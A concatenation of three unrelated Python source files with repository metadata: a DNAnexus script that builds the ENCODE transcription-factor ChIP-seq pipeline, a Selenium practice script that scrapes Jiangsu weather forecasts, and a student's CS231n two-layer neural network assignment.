a6a0280c8e64c9065944e620048f6383364b2778 | 5c205eab11d14b63e9fa7267d353448bc3761757 | /dnanexus/tf_workflow.py | ebec312ef82cccbec7f9d076eeb5a0068a9b8fef | [] | no_license | huboqiang/tf_chipseq | 909e07fa57698b398c957e47acae481691b04a57 | 6564b2e8f332b23d849c408e205781782f561ede | refs/heads/master | 2020-12-24T02:22:44.284115 | 2015-03-13T22:12:21 | 2015-03-13T22:12:21 | 32,879,755 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,183 | py | #!/usr/bin/env python
'''Instantiate the ENCODE ChIP-seq workflow'''
import pdb
import os.path, sys, subprocess, logging, re
import dxpy
EPILOG = '''Notes:
Examples:
Build blank workflow from fastq to peaks (no IDR)
%(prog)s
Build a blank workflow that includes both naive peak calling and IDR.
%(prog)s --idr
Build and run a workflow, specifying fastq's for two replicates and matched controls, including naive peaks and IDR.
%(prog)s --rep1 r1.fastq.gz --rep2 r2.fastq.gz --ctl1 c1.fastq.gz --ctl2 c2.fastq.gz --idr --yes
Build and run a workflow, specifying fastq's for two replicates and matched controls, reporting only IDR-processed peaks.
%(prog)s --rep1 r1.fastq.gz --rep2 r2.fastq.gz --ctl1 c1.fastq.gz --ctl2 c2.fastq.gz --idronly --yes
Build and run a workflow, skipping mapping and starting from tagAligns from paired-end data, reporting both naive and IDR-processed peaks.
%(prog)s --rep1 f1.tagAlign.gz --rep2 r2.tagAlign.gz --ctl1 c1.tagAlign.gz --ctl2 c2.tagAlign.gz --rep1pe --rep2pe --idr --yes
'''
WF_TITLE = 'tf_chip_seq'
WF_DESCRIPTION = 'ENCODE TF ChIP-Seq Pipeline'
MAPPING_APPLET_NAME = 'encode_bwa'
FILTER_QC_APPLET_NAME = 'filter_qc'
XCOR_APPLET_NAME = 'xcor'
XCOR_ONLY_APPLET_NAME = 'xcor_only'
SPP_APPLET_NAME = 'spp'
POOL_APPLET_NAME = 'pool'
PSEUDOREPLICATOR_APPLET_NAME = 'pseudoreplicator'
ENCODE_SPP_APPLET_NAME = 'encode_spp'
IDR_APPLET_NAME='idr'
ENCODE_IDR_APPLET_NAME='encode_idr'
APPLETS = {}
def get_args():
import argparse
parser = argparse.ArgumentParser(
description=__doc__, epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('--debug', help="Print debug messages", default=False, action='store_true')
parser.add_argument('--reference', help="Reference tar to map to", default='ENCODE Reference Files:/hg19/hg19_XY.tar.gz')
parser.add_argument('--rep1', help="Replicate 1 fastq or tagAlign", default=None, nargs='*')
parser.add_argument('--rep2', help="Replicate 2 fastq or tagAlign", default=None, nargs='*')
parser.add_argument('--ctl1', help="Control for replicate 1 fastq or tagAlign", default=None, nargs='*')
parser.add_argument('--ctl2', help="Control for replicate 2 fastq or tagAlign", default=None, nargs='*')
parser.add_argument('--outp', help="Output project name or ID", default=dxpy.WORKSPACE_ID)
parser.add_argument('--outf', help="Output folder name or ID", default="/analysis_run")
parser.add_argument('--name', help="Name of new workflow", default="TF ChIP-Seq")
parser.add_argument('--applets', help="Name of project containing applets", default="E3 ChIP-seq")
parser.add_argument('--nomap', help='Given tagAligns, skip to peak calling', default=False, action='store_true')
parser.add_argument('--rep1pe', help='Specify rep1 is paired end (only if --nomap)', default=False, action='store_true')
parser.add_argument('--rep2pe', help='Specify rep2 is paired end (only if --nomap)', default=False, action='store_true')
parser.add_argument('--blacklist', help="Blacklist to filter IDR peaks", default='ENCODE Reference Files:/hg19/blacklists/wgEncodeDacMapabilityConsensusExcludable.bed.gz')
parser.add_argument('--idr', help='Report peaks with and without IDR analysis', default=False, action='store_true')
parser.add_argument('--idronly', help='Only report IDR peaks', default=None, action='store_true')
parser.add_argument('--yes', help='Run the workflow', default=False, action='store_true')
args = parser.parse_args()
global DEBUG
DEBUG = args.debug
if DEBUG:
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
else: #use the defaulf logging level
logging.basicConfig(format='%(levelname)s:%(message)s')
logging.debug("rep1 is: %s" %(args.rep1))
return args
def blank_workflow(args):
return
def map_and_filter(infile, args):
if not infile:
return {None}
stages = {None}
return stages
def call_peaks(expvsctl, args):
if not expvsctl:
return {None}
stages = {None}
return stages
def resolve_project(identifier, privs='r'):
project = dxpy.find_one_project(name=identifier, level='VIEW', name_mode='exact', return_handler=True, zero_ok=True)
if project == None:
try:
project = dxpy.get_handler(identifier)
except:
logging.error('Could not find a unique project with name or id %s' %(identifier))
raise ValueError(identifier)
logging.debug('Project %s access level is %s' %(project.name, project.describe()['level']))
if privs == 'w' and project.describe()['level'] == 'VIEW':
logging.error('Output project %s is read-only' %(identifier))
raise ValueError(identifier)
return project
def resolve_folder(project, identifier):
if not identifier.startswith('/'):
identifier = '/' + identifier
try:
project_id = project.list_folder(identifier)
except:
try:
project_id = project.new_folder(identifier, parents=True)
except:
logging.error("Cannot create folder %s in project %s" %(identifier, project.name))
raise ValueError('%s:%s' %(project.name, identifier))
else:
logging.info("New folder %s created in project %s" %(identifier, project.name))
return identifier
def resolve_file(identifier):
logging.debug("resolve_file: %s" %(identifier))
if not identifier:
return None
m = re.match(r'''^([\w\-\ \.]+):([\w\-\ /\.]+)''', identifier)
if m:
project_identifier = m.group(1)
file_identifier = m.group(2)
else:
logging.debug("Defaulting to the current project")
project_identifier = dxpy.WORKSPACE_ID
file_identifier = identifier
project = resolve_project(project_identifier)
logging.debug("Got project %s" %(project.name))
logging.debug("Now looking for file %s" %(file_identifier))
m = re.match(r'''(^[\w\-\ /\.]+)/([\w\-\ \.]+)''', file_identifier)
if m:
folder_name = m.group(1)
if not folder_name.startswith('/'):
folder_name = '/' + folder_name
file_name = m.group(2)
else:
folder_name = '/'
file_name = file_identifier
logging.debug("Looking for file %s in folder %s" %(file_name, folder_name))
try:
file_handler = dxpy.find_one_data_object(name=file_name, folder=folder_name, project=project.get_id(),
more_ok=False, zero_ok=False, return_handler=True)
except:
logging.debug('%s not found in project %s folder %s' %(file_name, project.get_id(), folder_name))
try:
file_handler = dxpy.DXFile(dxid=identifier, mode='r')
except:
logging.debug('%s not found as a dxid' %(identifier))
try:
file_handler = resolve_accession(identifier)
except:
logging.debug('%s not found as an accession' %(identifier))
logging.warning('Could not find file %s.' %(identifier))
return None
logging.info("Resolved file identifier %s to %s" %(identifier, file_handler.get_id()))
return file_handler
def resolve_accession(accession):
logging.debug("Looking for accession %s" %(accession))
if not re.match(r'''^ENCFF\d{3}[A-Z]{3}''', accession):
logging.debug("%s is not a valid accession format" %(accession))
raise ValueError(accession)
DNANEXUS_ENCODE_SNAPSHOT = 'ENCODE-SDSC-snapshot-20140505'
logging.debug('Testing')
try:
snapshot_project
except:
logging.debug('Looking for snapshot project %s' %(DNANEXUS_ENCODE_SNAPSHOT))
try:
project_handler = resolve_project(DNANEXUS_ENCODE_SNAPSHOT)
global snapshot_project
snapshot_project = project_handler
except:
logging.error("Cannot find snapshot project %s" %(DNANEXUS_ENCODE_SNAPSHOT))
raise ValueError(DNANEXUS_ENCODE_SNAPSHOT)
logging.debug('Found snapshot project %s' %(snapshot_project.name))
try:
accession_search = accession + '*'
logging.debug('Looking recursively for %s in %s' %(accession_search, snapshot_project.name))
file_handler = dxpy.find_one_data_object(
name=accession_search, name_mode='glob', more_ok=False, classname='file', recurse=True, return_handler=True,
folder='/', project=snapshot_project.get_id())
logging.debug('Got file handler for %s' %(file_handler.name))
return file_handler
except:
logging.error("Cannot find accession %s in project %s" %(accession, snapshot_project.name))
raise ValueError(accession)
def find_applet_by_name(applet_name, applets_project_id):
'''Looks up an applet by name in the project that holds tools. From Joe Dale's code.'''
cached = '*'
if (applet_name, applets_project_id) not in APPLETS:
found = dxpy.find_one_data_object(classname="applet", name=applet_name,
project=applets_project_id,
zero_ok=False, more_ok=False, return_handler=True)
APPLETS[(applet_name, applets_project_id)] = found
cached = ''
logging.info(cached + "Resolved applet %s to %s" %(applet_name, APPLETS[(applet_name, applets_project_id)].get_id()))
return APPLETS[(applet_name, applets_project_id)]
def main():
args = get_args()
output_project = resolve_project(args.outp, 'w')
logging.info('Found output project %s' %(output_project.name))
output_folder = resolve_folder(output_project, args.outf)
logging.info('Using output folder %s' %(output_folder))
applet_project = resolve_project(args.applets, 'r')
logging.info('Found applet project %s' %(applet_project.name))
workflow = dxpy.new_dxworkflow(
title=WF_TITLE,
name=args.name,
description=WF_DESCRIPTION,
project=output_project.get_id(),
folder=output_folder)
blank_workflow = not (args.rep1 or args.rep2 or args.ctl1 or args.ctl2)
if not args.nomap:
#this whole strategy is fragile and unsatisfying
#subsequent code assumes reps come before contols
#a "superstage" is just a dict with a name, name(s) of input files, and then names and id's of stages that process that input
#each superstage here could be implemented as a stage in a more abstract workflow. That stage would then call the various applets that are separate
#stages here.
mapping_superstages = [
{'name': 'Rep1', 'input_args': args.rep1},
{'name': 'Rep2', 'input_args': args.rep2},
{'name': 'Ctl1', 'input_args': args.ctl1},
{'name': 'Ctl2', 'input_args': args.ctl2}
# {'name': 'Pooled Reps', 'input_args': (args.rep1 and args.rep2)},
# {'name': 'Pooled Controls', 'input_args': (args.ctl1 and args.ctl2)} ##idea is to create a "stub" stage and then populate it's input with the output of the pool stage, defined below
]
mapping_applet = find_applet_by_name(MAPPING_APPLET_NAME, applet_project.get_id())
mapping_output_folder = resolve_folder(output_project, output_folder + '/' + mapping_applet.name)
reference_tar = resolve_file(args.reference)
filter_qc_applet = find_applet_by_name(FILTER_QC_APPLET_NAME, applet_project.get_id())
filter_qc_output_folder = mapping_output_folder
xcor_applet = find_applet_by_name(XCOR_APPLET_NAME, applet_project.get_id())
xcor_output_folder = mapping_output_folder
for mapping_superstage in mapping_superstages:
superstage_name = mapping_superstage.get('name')
if mapping_superstage.get('input_args') or blank_workflow:
if blank_workflow:
mapping_stage_input = None
else:
mapping_stage_input = {'reference_tar' : dxpy.dxlink(reference_tar.get_id())}
for arg_index,input_arg in enumerate(mapping_superstage['input_args']): #read pairs assumed be in order read1,read2
reads = dxpy.dxlink(resolve_file(input_arg).get_id())
mapping_stage_input.update({'reads%d' %(arg_index+1): reads})
mapped_stage_id = workflow.add_stage(
mapping_applet,
name='Map %s' %(superstage_name),
folder=mapping_output_folder,
stage_input=mapping_stage_input
)
mapping_superstage.update({'map_stage_id': mapped_stage_id})
filter_qc_stage_id = workflow.add_stage(
filter_qc_applet,
name='Filter_QC %s' %(superstage_name),
folder=filter_qc_output_folder,
stage_input={
'input_bam': dxpy.dxlink({'stage': mapped_stage_id, 'outputField': 'mapped_reads'}),
'paired_end': dxpy.dxlink({'stage': mapped_stage_id, 'outputField': 'paired_end'})
}
)
mapping_superstage.update({'filter_qc_stage_id': filter_qc_stage_id})
xcor_stage_id = workflow.add_stage(
xcor_applet,
name='Xcor %s' %(superstage_name),
folder=xcor_output_folder,
stage_input={
'input_bam': dxpy.dxlink({'stage': filter_qc_stage_id, 'outputField': 'filtered_bam'}),
'paired_end': dxpy.dxlink({'stage': filter_qc_stage_id, 'outputField': 'paired_end'})
}
)
mapping_superstage.update({'xcor_stage_id': xcor_stage_id})
exp_rep1_ta = dxpy.dxlink(
{'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep1'),
'outputField': 'tagAlign_file'})
exp_rep1_cc = dxpy.dxlink(
{'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep1'),
'outputField': 'CC_scores_file'})
exp_rep2_ta = dxpy.dxlink(
{'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep2'),
'outputField': 'tagAlign_file'})
exp_rep2_cc = dxpy.dxlink(
{'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep2'),
'outputField': 'CC_scores_file'})
ctl_rep1_ta = dxpy.dxlink(
{'stage' : next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Ctl1'),
'outputField': 'tagAlign_file'})
ctl_rep2_ta = dxpy.dxlink(
{'stage' : next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Ctl2'),
'outputField': 'tagAlign_file'})
rep1_paired_end = dxpy.dxlink(
{'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep1'),
'outputField': 'paired_end'})
rep2_paired_end = dxpy.dxlink(
{'stage': next(ss.get('xcor_stage_id') for ss in mapping_superstages if ss['name'] == 'Rep2'),
'outputField': 'paired_end'})
else: #skipped the mapping, so just bring in the inputs from arguments
exp_rep1_ta = dxpy.dxlink(resolve_file(args.rep1[0]).get_id())
exp_rep2_ta = dxpy.dxlink(resolve_file(args.rep2[0]).get_id())
ctl_rep1_ta = dxpy.dxlink(resolve_file(args.ctl1[0]).get_id())
ctl_rep2_ta = dxpy.dxlink(resolve_file(args.ctl2[0]).get_id())
rep1_paired_end = args.rep1pe
rep2_paired_end = args.rep2pe
#here we need to calculate the cc scores files, because we're only being supplied tagAligns
#if we had mapped everything above we'd already have a handle to the cc file
xcor_only_applet = find_applet_by_name(XCOR_ONLY_APPLET_NAME, applet_project.get_id())
xcor_output_folder = resolve_folder(output_project, output_folder + '/' + xcor_only_applet.name)
xcor_only_stages = []
exp_rep1_cc_stage_id = workflow.add_stage(
xcor_only_applet,
name="Rep1 cross-correlation",
folder=xcor_output_folder,
stage_input={
'input_tagAlign': exp_rep1_ta,
'paired_end': rep1_paired_end
}
)
xcor_only_stages.append({'xcor_only_rep1_id': exp_rep1_cc_stage_id})
exp_rep1_cc = dxpy.dxlink(
{'stage': exp_rep1_cc_stage_id,
'outputField': 'CC_scores_file'})
exp_rep2_cc_stage_id = workflow.add_stage(
xcor_only_applet,
name="Rep2 cross-correlation",
folder=xcor_output_folder,
stage_input={
'input_tagAlign': exp_rep2_ta,
'paired_end': rep2_paired_end
}
)
xcor_only_stages.append({'xcor_only_rep2_id': exp_rep2_cc_stage_id})
exp_rep2_cc = dxpy.dxlink(
{'stage': exp_rep2_cc_stage_id,
'outputField': 'CC_scores_file'})
if not args.idronly:
spp_applet = find_applet_by_name(SPP_APPLET_NAME, applet_project.get_id())
peaks_output_folder = resolve_folder(output_project, output_folder + '/' + spp_applet.name)
spp_stages = []
if (args.rep1 and args.ctl1) or blank_workflow:
rep1_spp_stage_id = workflow.add_stage(
spp_applet,
name='Peaks Rep1',
folder=peaks_output_folder,
stage_input={
'experiment': exp_rep1_ta,
'control': ctl_rep1_ta,
'xcor_scores_input': exp_rep1_cc
}
)
spp_stages.append({'name': 'Peaks Rep1', 'stage_id': rep1_spp_stage_id})
if (args.rep2 and args.ctl2) or blank_workflow:
rep2_spp_stage_id = workflow.add_stage(
spp_applet,
name='Peaks Rep2',
folder=peaks_output_folder,
stage_input={
'experiment': exp_rep2_ta,
'control': ctl_rep2_ta,
'xcor_scores_input': exp_rep2_cc
}
)
spp_stages.append({'name': 'Peaks Rep2', 'stage_id': rep2_spp_stage_id})
if args.idr or args.idronly:
encode_spp_applet = find_applet_by_name(ENCODE_SPP_APPLET_NAME, applet_project.get_id())
encode_spp_stages = []
idr_peaks_output_folder = resolve_folder(output_project, output_folder + '/' + encode_spp_applet.name)
if (args.rep1 and args.ctl1 and args.rep2 and args.ctl2) or blank_workflow:
encode_spp_stage_id = workflow.add_stage(
encode_spp_applet,
name='Peaks for IDR',
folder=idr_peaks_output_folder,
stage_input={
'rep1_ta' : exp_rep1_ta,
'rep2_ta' : exp_rep2_ta,
'ctl1_ta': ctl_rep1_ta,
'ctl2_ta' : ctl_rep2_ta,
'rep1_xcor' : exp_rep1_cc,
'rep2_xcor' : exp_rep2_cc,
'rep1_paired_end': rep1_paired_end,
'rep2_paired_end': rep2_paired_end
}
)
encode_spp_stages.append({'name': 'Peaks for IDR', 'stage_id': encode_spp_stage_id})
idr_applet = find_applet_by_name(IDR_APPLET_NAME, applet_project.get_id())
encode_idr_applet = find_applet_by_name(ENCODE_IDR_APPLET_NAME, applet_project.get_id())
idr_stages = []
idr_output_folder = resolve_folder(output_project, output_folder + '/' + idr_applet.name)
if (args.rep1 and args.ctl1 and args.rep2 and args.ctl2) or blank_workflow or args.idronly:
idr_stage_id = workflow.add_stage(
idr_applet,
name='IDR True Replicates',
folder=idr_output_folder,
stage_input={
'rep1_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'rep1_peaks'}),
'rep2_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'rep2_peaks'}),
'pooled_peaks': dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'pooled_peaks'})
}
)
idr_stages.append({'name': 'IDR True Replicates', 'stage_id': idr_stage_id})
idr_stage_id = workflow.add_stage(
idr_applet,
name='IDR Rep 1 Self-pseudoreplicates',
folder=idr_output_folder,
stage_input={
'rep1_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'rep1pr1_peaks'}),
'rep2_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'rep1pr2_peaks'}),
'pooled_peaks': dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'rep1_peaks'})
}
)
idr_stages.append({'name': 'IDR Rep 1 Self-pseudoreplicates', 'stage_id': idr_stage_id})
idr_stage_id = workflow.add_stage(
idr_applet,
name='IDR Rep 2 Self-pseudoreplicates',
folder=idr_output_folder,
stage_input={
'rep1_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'rep2pr1_peaks'}),
'rep2_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'rep2pr2_peaks'}),
'pooled_peaks': dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'rep2_peaks'})
}
)
idr_stages.append({'name': 'IDR Rep 2 Self-pseudoreplicates', 'stage_id': idr_stage_id})
idr_stage_id = workflow.add_stage(
idr_applet,
name='IDR Pooled Pseudoeplicates',
folder=idr_output_folder,
stage_input={
'rep1_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'pooledpr1_peaks'}),
'rep2_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'pooledpr2_peaks'}),
'pooled_peaks': dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in encode_spp_stages if ss['name'] == 'Peaks for IDR'),
'outputField': 'pooled_peaks'})
}
)
idr_stages.append({'name': 'IDR Pooled Pseudoreplicates', 'stage_id': idr_stage_id})
blacklist = resolve_file(args.blacklist)
idr_stage_id = workflow.add_stage(
encode_idr_applet,
name='Final IDR peak calls',
folder=idr_output_folder,
stage_input={
'reps_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in idr_stages if ss['name'] == 'IDR True Replicates'),
'outputField': 'IDR_peaks'}),
'r1pr_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in idr_stages if ss['name'] == 'IDR Rep 1 Self-pseudoreplicates'),
'outputField': 'IDR_peaks'}),
'r2pr_peaks' : dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in idr_stages if ss['name'] == 'IDR Rep 2 Self-pseudoreplicates'),
'outputField': 'IDR_peaks'}),
'pooledpr_peaks': dxpy.dxlink(
{'stage': next(ss.get('stage_id') for ss in idr_stages if ss['name'] == 'IDR Pooled Pseudoreplicates'),
'outputField': 'IDR_peaks'}),
'blacklist': dxpy.dxlink(blacklist.get_id())
}
)
idr_stages.append({'name': 'Final IDR peak calls', 'stage_id': idr_stage_id})
if not (args.nomap):
logging.debug("Mapping stages: %s" %(mapping_superstages))
else:
logging.debug("xcor only stages: %s" %(xcor_only_stages))
if not args.idronly:
logging.debug("Peak stages: %s" %(spp_stages))
if args.idr or args.idronly:
logging.debug("Peaks for IDR stages: %s" %(encode_spp_stages))
logging.debug("IDR stages: %s" %(idr_stages))
if args.yes:
job_id = workflow.run({}, delay_workspace_destruction=True)
logging.info("Running as job %s" %(job_id))
if __name__ == '__main__':
main()
| [
"jseth@stanford.edu"
] | jseth@stanford.edu |
f94f70300297d6540a203b03e0a808f40fb78e99 | 3cedc7c1519d3b013aad9ec4e6a6ee7834da7589 | /selenium_code/z_practise/001/sa2.py | f978ca4ea1b40e7eda5051133e473ae0a9999596 | [] | no_license | hzrg/songqin_course | 53437100669ee93d2ac5ecae5de938b1a4007d7f | 05e422ce34a42fd6d3819722a19252f8005e79ed | refs/heads/master | 2022-02-09T13:27:59.871400 | 2019-06-13T06:08:45 | 2019-06-13T06:08:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | # coding:utf8
from selenium import webdriver
# 导入浏览器驱动路径
executable_path = r"d:\tools\webdrivers\chromedriver.exe"
# 指定是chrome 的驱动
# 执行到这里的时候Selenium会去到指定的路径将chrome driver 程序运行起来
driver = webdriver.Chrome(executable_path)
# ------------------------
driver.get('http://www.weather.com.cn/html/province/jiangsu.shtml')
# 分析html发现 温度信息在forecastID 子元素dl里面
info = driver.find_element_by_id("forecastID")
# 再从 forecastID 元素获取所有子元素dl
dls = info.find_elements_by_tag_name('dl')
# 将城市和气温信息保存到列表citys中
citys = []
for dl in dls:
# print dl.get_attribute('innerHTML')
name = dl.find_element_by_tag_name('dt').text
# 最高最低气温位置会变,根据位置决定是span还是b
ltemp = dl.find_element_by_tag_name('b').text
ltemp = int(ltemp.replace(u'℃',''))
print(name, ltemp)
citys.append([name, ltemp])
lowest = 100
lowestCitys = [] # 温度最低城市列表
for one in citys:
curcity = one[0]
ltemp = one[1]
curlowweather = ltemp
# 发现气温更低的城市
if curlowweather<lowest:
lowest = curlowweather
lowestCitys = [curcity]
# 温度和当前最低相同,加入列表
elif curlowweather ==lowest:
lowestCitys.append(curcity)
print('温度最低为%s, 城市有%s' % (lowest, ','.join(lowestCitys)))
# ------------------------
driver.quit() | [
"1174497735@qq.com"
] | 1174497735@qq.com |
f9517abbc68b8dd5fa38af5011ed894fead69e7b | c047005bd92cdb26b7aac56a0592d705fd3a89f4 | /Assignment_1/assignment1/cs231n/classifiers/neural_net.py | 8fe09672517395d4ae43656ff7b151c3595bcbf2 | [] | no_license | Rowan23/Stanford_cnn | e9ef6f568afd42a1e7cc21752f42ac1463e53133 | 9411e98f01e449fb7478c0e346231ee997f62eb6 | refs/heads/master | 2021-05-05T13:07:54.436546 | 2018-01-22T07:10:24 | 2018-01-22T07:10:24 | 118,317,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,484 | py | from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
from past.builtins import xrange
class TwoLayerNet(object):
"""
A two-layer fully-connected neural network. The net has an input dimension of
N, a hidden layer dimension of H, and performs classification over C classes.
We train the network with a softmax loss function and L2 regularization on the
weight matrices. The network uses a ReLU nonlinearity after the first fully
connected layer.
In other words, the network has the following architecture:
input - fully connected layer - ReLU - fully connected layer - softmax
The outputs of the second fully-connected layer are the scores for each class.
"""
def __init__(self, input_size, hidden_size, output_size, std=1e-4):
"""
Initialize the model. Weights are initialized to small random values and
biases are initialized to zero. Weights and biases are stored in the
variable self.params, which is a dictionary with the following keys:
W1: First layer weights; has shape (D, H)
b1: First layer biases; has shape (H,)
W2: Second layer weights; has shape (H, C)
b2: Second layer biases; has shape (C,)
Inputs:
- input_size: The dimension D of the input data.
- hidden_size: The number of neurons H in the hidden layer.
- output_size: The number of classes C.
"""
self.params = {}
self.params['W1'] = std * np.random.randn(input_size, hidden_size)
self.params['b1'] = np.zeros(hidden_size)
self.params['W2'] = std * np.random.randn(hidden_size, output_size)
self.params['b2'] = np.zeros(output_size)
def loss(self, X, y=None, reg=0.0):
"""
Compute the loss and gradients for a two layer fully connected neural
network.
Inputs:
- X: Input data of shape (N, D). Each X[i] is a training sample.
- y: Vector of training labels. y[i] is the label for X[i], and each y[i] is
an integer in the range 0 <= y[i] < C. This parameter is optional; if it
is not passed then we only return scores, and if it is passed then we
instead return the loss and gradients.
- reg: Regularization strength.
Returns:
If y is None, return a matrix scores of shape (N, C) where scores[i, c] is
the score for class c on input X[i].
If y is not None, instead return a tuple of:
- loss: Loss (data loss and regularization loss) for this batch of training
samples.
- grads: Dictionary mapping parameter names to gradients of those parameters
with respect to the loss function; has the same keys as self.params.
"""
# Unpack variables from the params dictionary
W1, b1 = self.params['W1'], self.params['b1']
W2, b2 = self.params['W2'], self.params['b2']
N, D = X.shape
# Compute the forward pass
scores = None
#############################################################################
# TODO: Perform the forward pass, computing the class scores for the input. #
# Store the result in the scores variable, which should be an array of #
# shape (N, C). #
#############################################################################
h = np.maximum(X.dot(W1)+b1,0)
scores = h.dot(W2)+b2
#############################################################################
# END OF YOUR CODE #
#############################################################################
# If the targets are not given then jump out, we're done
if y is None:
return scores
# Compute the loss
loss = None
#############################################################################
# TODO: Finish the forward pass, and compute the loss. This should include #
# both the data loss and L2 regularization for W1 and W2. Store the result #
# in the variable loss, which should be a scalar. Use the Softmax #
# classifier loss. #
#############################################################################
expScores = np.exp(scores)
softmax = expScores/np.sum(expScores,axis =1)[:,np.newaxis]
loss = np.sum(-np.log(softmax[range(N),y]))/N
loss += reg*(np.sum(W1 * W1) + np.sum(W2*W2)) #biases???
#############################################################################
# END OF YOUR CODE #
#############################################################################
# Backward pass: compute gradients
grads = {}
#############################################################################
# TODO: Compute the backward pass, computing the derivatives of the weights #
# and biases. Store the results in the grads dictionary. For example, #
# grads['W1'] should store the gradient on W1, and be a matrix of same size #
#############################################################################
dScores = softmax
dScores[range(N),y] -= 1
dScores /=N
grads['b2'] = np.ones(N).dot(dScores)
grads['W2'] = np.transpose(h).dot(dScores) + reg*2*W2
dh = dScores.dot(np.transpose(W2))
dIntermediate = dh*(h>0)
grads['b1'] = np.ones(N).dot(dIntermediate)
grads['W1'] = np.transpose(X).dot(dIntermediate) + reg*2*W1
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, grads
def train(self, X, y, X_val, y_val,
learning_rate=1e-3, learning_rate_decay=0.95,
reg=5e-6, num_iters=100,
batch_size=200, verbose=False):
"""
Train this neural network using stochastic gradient descent.
Inputs:
- X: A numpy array of shape (N, D) giving training data.
- y: A numpy array f shape (N,) giving training labels; y[i] = c means that
X[i] has label c, where 0 <= c < C.
- X_val: A numpy array of shape (N_val, D) giving validation data.
- y_val: A numpy array of shape (N_val,) giving validation labels.
- learning_rate: Scalar giving learning rate for optimization.
- learning_rate_decay: Scalar giving factor used to decay the learning rate
after each epoch.
- reg: Scalar giving regularization strength.
- num_iters: Number of steps to take when optimizing.
- batch_size: Number of training examples to use per step.
- verbose: boolean; if true print progress during optimization.
"""
num_train = X.shape[0]
iterations_per_epoch = max(num_train / batch_size, 1)
# Use SGD to optimize the parameters in self.model
loss_history = []
train_acc_history = []
val_acc_history = []
for it in xrange(num_iters):
X_batch = None
y_batch = None
#########################################################################
# TODO: Create a random minibatch of training data and labels, storing #
# them in X_batch and y_batch respectively. #
#########################################################################
randIds = np.random.choice(num_train,batch_size)
X_batch = X[randIds]
y_batch = y[randIds]
#########################################################################
# END OF YOUR CODE #
#########################################################################
# Compute loss and gradients using the current minibatch
loss, grads = self.loss(X_batch, y=y_batch, reg=reg)
loss_history.append(loss)
#########################################################################
# TODO: Use the gradients in the grads dictionary to update the #
# parameters of the network (stored in the dictionary self.params) #
# using stochastic gradient descent. You'll need to use the gradients #
# stored in the grads dictionary defined above. #
#########################################################################
for param in self.params:
self.params[param] -= learning_rate*grads[param]
#########################################################################
# END OF YOUR CODE #
#########################################################################
if verbose and it % 100 == 0:
print('iteration %d / %d: loss %f' % (it, num_iters, loss))
# Every epoch, check train and val accuracy and decay learning rate.
if it % iterations_per_epoch == 0:
# Check accuracy
train_acc = (self.predict(X_batch) == y_batch).mean()
val_acc = (self.predict(X_val) == y_val).mean()
train_acc_history.append(train_acc)
val_acc_history.append(val_acc)
# Decay learning rate
learning_rate *= learning_rate_decay
return {
'loss_history': loss_history,
'train_acc_history': train_acc_history,
'val_acc_history': val_acc_history,
}
def predict(self, X):
"""
Use the trained weights of this two-layer network to predict labels for
data points. For each data point we predict scores for each of the C
classes, and assign each data point to the class with the highest score.
Inputs:
- X: A numpy array of shape (N, D) giving N D-dimensional data points to
classify.
Returns:
- y_pred: A numpy array of shape (N,) giving predicted labels for each of
the elements of X. For all i, y_pred[i] = c means that X[i] is predicted
to have class c, where 0 <= c < C.
"""
y_pred = None
###########################################################################
# TODO: Implement this function; it should be VERY simple! #
###########################################################################
y_pred = np.argmax(self.loss(X),axis =1)
###########################################################################
# END OF YOUR CODE #
###########################################################################
return y_pred
| [
"rowanjlange@gmail.com"
] | rowanjlange@gmail.com |
